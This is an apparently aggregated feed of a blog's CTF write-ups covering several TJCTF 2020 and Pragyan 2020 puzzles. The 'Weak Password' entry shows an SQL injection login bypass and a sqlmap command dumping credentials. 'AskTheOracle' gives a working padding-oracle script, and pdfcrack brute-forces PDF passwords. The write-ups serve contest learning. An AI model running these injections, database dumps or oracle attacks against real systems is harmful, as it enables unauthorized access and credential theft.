<span class="n">word</span> <span class="o">=</span> <span class="n">word</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">','</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">':'</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'!'</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'?'</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">')'</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'('</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s1">'"'</span><span class="p">,</span><span class="s1">''</span><span class="p">)</span>
<span class="k">if</span> <span class="n">word</span> <span class="o">==</span> <span class="s2">""</span><span class="p">:</span>
<span class="k">continue</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">"tjctf{"</span> <span class="o">+</span> <span class="n">word</span> <span class="o">+</span> <span class="s2">"}"</span>
<span class="n">hex_result</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">(</span><span class="n">flag</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
<span class="n">ha</span> <span class="o">=</span> <span class="n">hex_result</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="k">if</span> <span class="n">ha</span> <span class="o">==</span> <span class="s2">"9326ea0931baf5786cde7f280f965ebb"</span><span class="p">:</span>
<span class="k">break</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">continue</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<p>Run the script and wait for the flag:</p>
<div class="highlight"><pre><span></span><code>╰─ python titanic_mdf5.py
tjctf<span class="o">{</span>end<span class="o">}</span>
</code></pre></div>TJCTF2020 - Typewriter2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-typewriter.html<p><em>solves : 395</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by jpes707
Oh no! I thought I typed down the correct flag for this problem on my typewriter, but it came out all jumbled on the paper. Someone must have switched the inner hammers around! According to the paper, the flag is zpezy{ktr_gkqfut_hxkhst_tyukokkgotyt_hoftqhhst_ykxoz_qxilrtxiyf}.
Hint …</code></pre></div><p><em>solves : 395</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by jpes707
Oh no! I thought I typed down the correct flag for this problem on my typewriter, but it came out all jumbled on the paper. Someone must have switched the inner hammers around! According to the paper, the flag is zpezy{ktr_gkqfut_hxkhst_tyukokkgotyt_hoftqhhst_ykxoz_qxilrtxiyf}.
Hint: a becomes q, b becomes w, c becomes e, f becomes y, j becomes p, t becomes z, and z becomes m. Do you see the pattern?
</code></pre></div>
<p>With the hint, the solution is quite obvisous: we need to map the char back to qwerty keyboard layout.</p>
<div class="highlight"><pre><span></span><code><span class="n">flag</span> <span class="o">=</span> <span class="s2">"zpezy\</span><span class="si">{ktr_gkqfut_hxkhst_tyukokkgotyt_hoftqhhst_ykxoz_qxilrtxiyf}</span><span class="s2">"</span>
<span class="n">layout</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'a'</span><span class="p">:</span> <span class="s1">'q'</span><span class="p">,</span>
<span class="s1">'b'</span><span class="p">:</span> <span class="s1">'w'</span><span class="p">,</span>
<span class="s1">'c'</span><span class="p">:</span> <span class="s1">'e'</span><span class="p">,</span>
<span class="s1">'d'</span><span class="p">:</span> <span class="s1">'r'</span><span class="p">,</span>
<span class="s1">'e'</span><span class="p">:</span> <span class="s1">'t'</span><span class="p">,</span>
<span class="s1">'f'</span><span class="p">:</span> <span class="s1">'y'</span><span class="p">,</span>
<span class="s1">'g'</span><span class="p">:</span> <span class="s1">'u'</span><span class="p">,</span>
<span class="s1">'h'</span><span class="p">:</span> <span class="s1">'i'</span><span class="p">,</span>
<span class="s1">'i'</span><span class="p">:</span> <span class="s1">'o'</span><span class="p">,</span>
<span class="s1">'j'</span><span class="p">:</span> <span class="s1">'p'</span><span class="p">,</span>
<span class="s1">'k'</span><span class="p">:</span> <span class="s1">'a'</span><span class="p">,</span>
<span class="s1">'l'</span><span class="p">:</span> <span class="s1">'s'</span><span class="p">,</span>
<span class="s1">'m'</span><span class="p">:</span> <span class="s1">'d'</span><span class="p">,</span>
<span class="s1">'n'</span><span class="p">:</span> <span class="s1">'f'</span><span class="p">,</span>
<span class="s1">'o'</span><span class="p">:</span> <span class="s1">'g'</span><span class="p">,</span>
<span class="s1">'p'</span><span class="p">:</span> <span class="s1">'h'</span><span class="p">,</span>
<span class="s1">'q'</span><span class="p">:</span> <span class="s1">'j'</span><span class="p">,</span>
<span class="s1">'r'</span><span class="p">:</span> <span class="s1">'k'</span><span class="p">,</span>
<span class="s1">'s'</span><span class="p">:</span> <span class="s1">'l'</span><span class="p">,</span>
<span class="s1">'t'</span><span class="p">:</span> <span class="s1">'z'</span><span class="p">,</span>
<span class="s1">'u'</span><span class="p">:</span> <span class="s1">'x'</span><span class="p">,</span>
<span class="s1">'v'</span><span class="p">:</span> <span class="s1">'c'</span><span class="p">,</span>
<span class="s1">'w'</span><span class="p">:</span> <span class="s1">'v'</span><span class="p">,</span>
<span class="s1">'x'</span><span class="p">:</span> <span class="s1">'b'</span><span class="p">,</span>
<span class="s1">'y'</span><span class="p">:</span> <span class="s1">'n'</span><span class="p">,</span>
<span class="s1">'z'</span><span class="p">:</span> <span class="s1">'m'</span><span class="p">,</span>
<span class="s1">'_'</span><span class="p">:</span> <span class="s1">'_'</span><span class="p">,</span>
<span class="s1">'{'</span><span class="p">:</span> <span class="s1">'{'</span><span class="p">,</span>
<span class="s1">'}'</span><span class="p">:</span> <span class="s1">'}'</span>
<span class="p">}</span>
<span class="n">result</span> <span class="o">=</span> <span class="s2">""</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">flag</span><span class="p">:</span>
<span class="k">for</span> <span class="n">name</span><span class="p">,</span> <span class="n">age</span> <span class="ow">in</span> <span class="n">layout</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">if</span> <span class="n">age</span> <span class="o">==</span> <span class="n">c</span><span class="p">:</span>
<span class="n">result</span> <span class="o">+=</span> <span class="n">name</span>
<span class="nb">print</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
</code></pre></div>
<p>Run it and get some points!</p>
<div class="highlight"><pre><span></span><code>╰─ python typewriter.py
tjctf<span class="o">{</span>red_orange_purple_efgrirroiefe_pineapple_fruit_auhsdeuhfn<span class="o">}</span>
</code></pre></div>TJCTF2020 - Weak Password2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-weak-password.html<p><em>solves : 204</em></p>
<div class="highlight"><pre><span></span><code>Points: 20
Written by saisree
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only …</code></pre></div><p><em>solves : 204</em></p>
<div class="highlight"><pre><span></span><code>Points: 20
Written by saisree
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})
</code></pre></div>
<p>We have a standard login page with two fields: <code>username</code> and <code>password</code>. We need to recover the admin flag.</p>
<p><img alt="Weak_password_login.jpeg" src="https://blog.nlegall.fr/images/tjctf/2020/Weak_password_login.jpeg"></p>
<p>Let's try some standard SLQi : <code>' or 1=1--</code>.</p>
<p><img alt="Weak_password_login_2.jpeg" src="https://blog.nlegall.fr/images/tjctf/2020/Weak_password_login_2.jpeg"></p>
<p>We are login. So, the code form is vunerable. This time, I used sqlmap to dump the table and get the password:</p>
<div class="highlight"><pre><span></span><code>sqlmap https://weak_password.tjctf.org/login --method<span class="o">=</span>POST --data <span class="s2">"username=admin&password=admin"</span> -p <span class="s2">"password"</span> --not-string<span class="o">=</span><span class="s2">"Wrong"</span> --user-agent <span class="s2">"Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0"</span> --tamper<span class="o">=</span>space2comment --level <span class="m">5</span> --risk <span class="m">3</span> --tables --dump -T userandpassword
Database: SQLite_masterdb
Table: userandpassword
<span class="o">[</span><span class="m">6</span> entries<span class="o">]</span>
+----+-----------------------+---------------------+
<span class="p">|</span> id <span class="p">|</span> password <span class="p">|</span> username <span class="p">|</span>
+----+-----------------------+---------------------+
<span class="p">|</span> <span class="m">1</span> <span class="p">|</span> blindsqli14519 <span class="p">|</span> admin <span class="p">|</span>
<span class="p">|</span> <span class="m">2</span> <span class="p">|</span> random_passwd <span class="p">|</span> random_user <span class="p">|</span>
<span class="p">|</span> <span class="m">3</span> <span class="p">|</span> evenmorerandom_passwd <span class="p">|</span> evenmorerandom_user <span class="p">|</span>
<span class="p">|</span> <span class="m">4</span> <span class="p">|</span> blindsqli14519 <span class="p">|</span> admin <span class="p">|</span>
<span class="p">|</span> <span class="m">5</span> <span class="p">|</span> random_passwd <span class="p">|</span> random_user <span class="p">|</span>
<span class="p">|</span> <span class="m">6</span> <span class="p">|</span> evenmorerandom_passwd <span class="p">|</span> evenmorerandom_user <span class="p">|</span>
+----+-----------------------+---------------------+
</code></pre></div>
<p>We got the flag: <code>tjctf{blindsqli14519}</code>.</p>TJCTF2020 - Zipped Up2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-zipped-up.html<p><em>solves : 255</em></p>
<div class="highlight"><pre><span></span><code>Points: 70
Written by agcdragon
My friend changed the password of his Minecraft account that I was using so that I would stop being so addicted. Now he wants me to work for the password and sent me this zip file. I tried unzipping the folder, but it …</code></pre></div><p><em>solves : 255</em></p>
<div class="highlight"><pre><span></span><code>Points: 70
Written by agcdragon
My friend changed the password of his Minecraft account that I was using so that I would stop being so addicted. Now he wants me to work for the password and sent me this zip file. I tried unzipping the folder, but it just led to another zipped file. Can you find me the password so I can play Minecraft again?
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/663d7cda5bde67bd38a8de1f07fb9fab9dd8dd0b75607bb459c899acb0ace980_0.zip">Zip file</a></p>
<p>We have a zip archive that contains another archive inside with a text file:</p>
<div class="highlight"><pre><span></span><code>╰─ tar -jtvf <span class="m">1</span>.tar.bz2
drwxr-xr-x andy/andy <span class="m">0</span> <span class="m">2020</span>-03-09 <span class="m">02</span>:58 <span class="m">1</span>/
-rw-r--r-- andy/andy <span class="m">1022589</span> <span class="m">2020</span>-03-09 <span class="m">02</span>:58 <span class="m">1</span>/2.tar.bz2
-rw-r--r-- andy/andy <span class="m">20</span> <span class="m">2020</span>-03-09 <span class="m">02</span>:57 <span class="m">1</span>/1.txt
╰─ cat <span class="m">1</span>.txt
tjctf<span class="o">{</span>n0t_th3_fl4g<span class="o">}</span>
</code></pre></div>
<p>So, we need to extract all archive and check if the text file contains the flag. I made a bash python script to extract the archive:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">subprocess</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1000</span><span class="p">):</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".tar.bz2"</span><span class="p">])</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".kz3"</span><span class="p">])</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".tar.gz"</span><span class="p">])</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".tar"</span><span class="p">])</span>
<span class="k">pass</span>
</code></pre></div>
<p>We have the first 1000 archives. Let's check if we got the flag:</p>
<div class="highlight"><pre><span></span><code>╰─ rg -v <span class="s1">'n0t_th3'</span> *.txt
<span class="m">829</span>.txt
<span class="m">1</span>:tjctf<span class="o">{</span>p3sky_z1p_f1L35<span class="o">}</span>
</code></pre></div>
<p>Great! It was inside the 829th archive.</p>Pragyan 2020 - ASCII Sentence2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-ascii-sentence.html<p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code>Decode this
8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161
</code></pre></div>
<p>Since it's ASCII, we need to create correct value in order to process it.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">base64</span>
<span class="n">decode</span> <span class="o">=</span> <span class="s2">"8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161"</span>
<span class="n">asci</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">x</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="n">x</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">decode</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="n">asci</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">2</span><span class="p">])))</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">3</span>
<span class="k">else …</span></code></pre></div><p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code>Decode this
8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161
</code></pre></div>
<p>Since it's ASCII, we need to create correct value in order to process it.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">base64</span>
<span class="n">decode</span> <span class="o">=</span> <span class="s2">"8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161"</span>
<span class="n">asci</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">x</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="n">x</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">decode</span><span class="p">):</span>
<span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="n">asci</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">2</span><span class="p">])))</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">3</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">asci</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">])))</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">2</span>
<span class="n">x</span> <span class="o">+=</span> <span class="n">i</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">asci</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"base64 decode: "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s2">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">asci</span><span class="p">))))</span>
</code></pre></div>
<p>Let's run the script and get the decoded string:</p>
<div class="highlight"><pre><span></span><code>$ python ascii.py
<span class="nv">Y3t1cnRfYXNsa29fZV9mb2FfZWVlX25nZHlwdHlfZWh3a3RpX29ifQ</span><span class="o">==</span>
base64 decode: b<span class="s1">'c{urt_aslko_e_foa_eee_ngdypty_ehwkti_ob}'</span>
</code></pre></div>
<p>Ok, we got some clear text but shuffled. After some looking after Rail-fence and try all ROT possibilities, we split the sting in three parts:</p>
<div class="highlight"><pre><span></span><code><span class="err">pty_ehwkti_ob}</span>
<span class="err">_foa_eee_ngdy</span>
<span class="err">c{urt_aslko_e</span>
</code></pre></div>
<p>If you read by column, you have the flag: <code>p_ctf{you_are_the_weakest_link_good_bye}</code>.</p>Pragyan 2020 - AskTheOracle2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-asktheoracle.html<div class="highlight"><pre><span></span><code>AskTheOracle (150pts)
Mr Robot has worked all night to find the Cipher "TIe8CkeWpqPFBmFcIqZG0JoGqBIWZ9dHbDqqfdx2hPlqHvwH/+tbAXDSyzyrn1Wf" then he faints of Overdose.You are left with a challenge to get the key to the database before EVIL CORP starts backing up the data.
nc ctf.pragyan.org 8500
P.S- After solving you …</code></pre></div><div class="highlight"><pre><span></span><code>AskTheOracle (150pts)
Mr Robot has worked all night to find the Cipher "TIe8CkeWpqPFBmFcIqZG0JoGqBIWZ9dHbDqqfdx2hPlqHvwH/+tbAXDSyzyrn1Wf" then he faints of Overdose.You are left with a challenge to get the key to the database before EVIL CORP starts backing up the data.
nc ctf.pragyan.org 8500
P.S- After solving you will get a flag in the format of pctf{code}, change it to p_ctf{code} and submit it.
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ nc ctf.pragyan.org <span class="m">8500</span>
Enter in format <span class="s1">'<Ciphertext>|<Initialisation Vector>'</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">pwn</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64encode</span><span class="p">,</span> <span class="n">b64decode</span>
<span class="n">pwn</span><span class="o">.</span><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">logging</span><span class="o">.</span><span class="n">ERROR</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="s2">"TIe8CkeWpqPFBmFcIqZG0JoGqBIWZ9dHbDqqfdx2hPlqHvwH/+tbAXDSyzyrn1Wf"</span>
<span class="n">cipherb</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">cipher</span><span class="p">)</span>
<span class="n">iv</span> <span class="o">=</span> <span class="s2">"VGhpcyBpcyBhbiBJVjQ1Ng=="</span>
<span class="n">ivb</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span>
<span class="n">allb</span> <span class="o">=</span> <span class="n">ivb</span> <span class="o">+</span> <span class="n">cipherb</span>
<span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">cipher</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span>
<span class="n">conn</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">remote</span><span class="p">(</span><span class="s1">'ctf.pragyan.org'</span><span class="p">,</span> <span class="mi">8500</span><span class="p">)</span>
<span class="n">conn</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s1">'Enter in format </span><span class="se">\'</span><span class="s1"><Ciphertext>|<Initialisation Vector></span><span class="se">\'\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">conn</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{</span><span class="n">cipher</span><span class="si">}</span><span class="s1">|</span><span class="si">{</span><span class="n">iv</span><span class="si">}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
<span class="n">conn</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s1">'VGhpcyBpcyBhbiBJVjQ1Ng==</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">()</span>
<span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">return</span> <span class="sa">b</span><span class="s1">'Cipher Error!</span><span class="se">\n</span><span class="s1">'</span> <span class="ow">in</span> <span class="n">res</span>
<span class="n">plain</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">block</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">allb</span><span class="p">),</span> <span class="mi">16</span><span class="p">,</span> <span class="o">-</span><span class="mi">16</span><span class="p">):</span>
<span class="n">pad</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">c2</span> <span class="o">=</span> <span class="n">b64encode</span><span class="p">(</span><span class="nb">bytearray</span><span class="p">(</span><span class="n">allb</span><span class="p">[</span><span class="n">block</span> <span class="o">-</span> <span class="mi">16</span><span class="p">:</span><span class="n">block</span><span class="p">]))</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span>
<span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">17</span><span class="p">):</span>
<span class="n">c1b</span> <span class="o">=</span> <span class="n">allb</span><span class="p">[</span><span class="n">block</span> <span class="o">-</span> <span class="mi">16</span> <span class="o">-</span> <span class="n">byte</span><span class="p">]</span>
<span class="n">c1</span> <span class="o">=</span> <span class="p">(</span><span class="mi">16</span> <span class="o">-</span> <span class="n">byte</span><span class="p">)</span> <span class="o">*</span> <span class="p">[</span><span class="mh">0xf0</span><span class="p">]</span> <span class="o">+</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="p">[</span><span class="n">p</span> <span class="o">^</span> <span class="n">byte</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">pad</span><span class="p">]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
<span class="k">if</span> <span class="n">c1b</span> <span class="o">^</span> <span class="p">(</span><span class="n">i</span> <span class="o">^</span> <span class="n">byte</span><span class="p">)</span> <span class="o">></span> <span class="mi">126</span><span class="p">:</span>
<span class="k">continue</span>
<span class="n">c1</span><span class="p">[</span><span class="o">-</span><span class="n">byte</span><span class="p">]</span> <span class="o">=</span> <span class="n">i</span>
<span class="k">if</span> <span class="n">send</span><span class="p">(</span><span class="n">c2</span><span class="p">,</span> <span class="n">b64encode</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">c1</span><span class="p">))</span><span class="o">.</span><span class="n">decode</span><span class="p">()):</span>
<span class="n">pad</span><span class="o">.</span><span class="n">insert</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">i</span> <span class="o">^</span> <span class="n">byte</span><span class="p">)</span>
<span class="n">plain</span><span class="o">.</span><span class="n">insert</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">c1b</span> <span class="o">^</span> <span class="p">(</span><span class="n">i</span> <span class="o">^</span> <span class="n">byte</span><span class="p">))</span>
<span class="k">break</span>
<span class="nb">print</span><span class="p">(</span><span class="n">plain</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="nb">chr</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">plain</span><span class="p">]))</span>
</code></pre></div>Pragyan 2020 - Encuéntralo si puedes2020-02-26T00:00:00+01:002020-02-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-02-26:/pragyan-2020-encuentralo-si-puedes.html<div class="highlight"><pre><span></span><code>Encuéntralo si puedes (350pts)
Solved by: 12%
Luis is very fond of music. Recently he developed a keen interest in CTF challenges. He makes a challenge for yankee and asks him if he could break it and find the code from it. Help yankee to find the secret code.
The …</code></pre></div><div class="highlight"><pre><span></span><code>Encuéntralo si puedes (350pts)
Solved by: 12%
Luis is very fond of music. Recently he developed a keen interest in CTF challenges. He makes a challenge for yankee and asks him if he could break it and find the code from it. Help yankee to find the secret code.
The flag format - p_ctf{OBTAINED_SECRET_CODE}
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ ffprobe despacito_luisFonsi.mp3
<span class="o">[</span>...<span class="o">]</span>
Input <span class="c1">#0, mp3, from 'despacito_luisFonsi.mp3':</span>
Metadata:
track : <span class="m">01</span>
Software : Lavf58.33.100
artist : Luis Fonsi ft. Daddy Yankee
genre : POP
Unknown text information frame: <span class="m">2017</span>
title : Despacito
comment : Better go last than first
album : Despacito
date : <span class="m">2017</span>
Duration: <span class="m">00</span>:05:21.43, start: <span class="m">0</span>.023021, bitrate: <span class="m">166</span> kb/s
Stream <span class="c1">#0:0: Audio: mp3, 48000 Hz, stereo, fltp, 166 kb/s</span>
Metadata:
encoder : LAME3.100
</code></pre></div>
<p>Ok, we know how to look for the information: end of the song.</p>
<p>We can use Audacity to open the file and use the spectogram view to show the information:</p>
<p><img alt="encuentralo1" src="https://blog.nlegall.fr/images/pragyan/encuentralo1.png"></p>
<p>Looks like morse code. After right all down, we can decode and got a message:</p>
<div class="highlight"><pre><span></span><code><span class="cp">..-. ..- . .-. –.. .- -..-. -... .-. ..- – . -..-. -.. . -..-. -.-. .. -. -.-. — -..-. -.. .. –. .. – — ... -..-. -.-. — -. -..-. — .. -. ..- ... -.-. ..- .-.. .- ... -..-. -.– -..-. -. ..- — . .-. — ...</span>
</code></pre></div>
<p><code>FUERZA/BRUTE/DE/CINCO/DIGITOS/CON/MINUSCULAS/Y/NUMEROS</code></p>
<p>We know now what kind of password we are looking. The tool <code>pdfcrack</code> can be use with specify the the minimal/maximal (<code>-n</code> and <code>-m</code>) lenght and space of the password (<code>-c</code>).</p>
<div class="highlight"><pre><span></span><code>$ ./pdfcrack -f ../1Hola.pdf -c <span class="s2">"abcdefghifklmnopqrstuvwxyz0123456789"</span> -n <span class="m">5</span> -m <span class="m">5</span>
PDF version <span class="m">1</span>.3
Security Handler: Standard
V: <span class="m">2</span>
R: <span class="m">3</span>
P: -3904
Length: <span class="m">128</span>
Encrypted Metadata: True
FileID: 34ef3f1f94c5a1a642014ddf22af7900
U: 5233de370d2758db5857a2a21592631c00000000000000000000000000000000
O: fc81cb565ad34c0f8d431ec8772e44d7ee7da867715f50294bfe5b23116564c4
Average Speed: <span class="m">28059</span>.7 w/s. Current Word: <span class="s1">'zabma'</span>
<span class="o">[</span>...<span class="o">]</span>
Average Speed: <span class="m">27737</span>.7 w/s. Current Word: <span class="s1">'v3dmz'</span>
Average Speed: <span class="m">28639</span>.5 w/s. Current Word: <span class="s1">'p2nyz'</span>
found user-password: <span class="s1">'x2n1z'</span>
</code></pre></div>
<p>Ok, we got the first password for the PDF files. Let's do the same for the two others files: <code>found user-password: '39adz'</code> and <code>found user-password: '8yfa2'</code>.</p>
<p>We got the two PDFs used to explain the SHA1 collision: <a href="https://shattered.io/">https://shattered.io/</a>. The last PDF told us how to get the flag: <code>SHA1[original files] = base64-decrypt(base64-decrypt(flag))</code>.</p>
